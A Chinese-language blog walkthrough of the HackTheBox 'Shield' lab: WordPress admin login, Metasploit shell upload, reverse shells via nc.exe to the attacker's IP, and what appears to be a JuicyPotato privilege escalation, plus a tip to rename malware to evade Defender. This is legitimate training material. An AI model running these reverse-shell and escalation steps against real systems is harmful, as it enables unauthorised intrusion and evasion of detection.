HackTheBox Starting Point Shield .29

Posted by Mr.Be1ieVe on Monday, April 19, 2021

扫描出来80 ISS和 3306 mysql

bp发现路径下有wordpress

查看wordpress版本,网页搜索generator即可搜到generator

wordpress 登陆界面,使用看到的admin账户和先前的密码登录即可。

使用msf的exploit/unix/webapp/wp_admin_shell_upload就可以获得meterpreter shell,注意要设置LHOSTS不然弹不回来

Meterpreter

cd C:/inetpub/wwwroot/wordpress/wp-content/uploads

\wordpress\wp-content\uploads目录下上传nc upload /home/kali/Desktop/tools/windows-exe/nc.exe

反弹shell execute -f nc.exe -a "-e cmd.exe 10.10.14.87 4444"

这里我傻了端口跟msf的meterpreter重复了,所以获取不到shell,并且nc也不支持-e。。。

使用这个可以

在metepreter里可以使用sysinfo查看os信息

查看到windowsserver2016 可以使用 这个

上传一个内容为

START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.87 1111

的bat脚本

upload /home/kali/Desktop/HTB/StartingPoint/29/shell.bat

随后,先监听新的端口nc -lvp 1111 在第一次获取的shell中js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337

成功即可获得admin权限的powershell

知识点

win移动要使用/ / /,不能简单复制linux的\ \ \ \

一般恶意软件需要改名,不然更容易被defender识别

msf获取的shell感觉不是特别的稳定

这应该叫使用cve获取高权限再反弹出来

「真诚赞赏,手留余香」

Mr.Be1ieVe's Treasure

真诚赞赏,手留余香

使用微信扫描二维码完成支付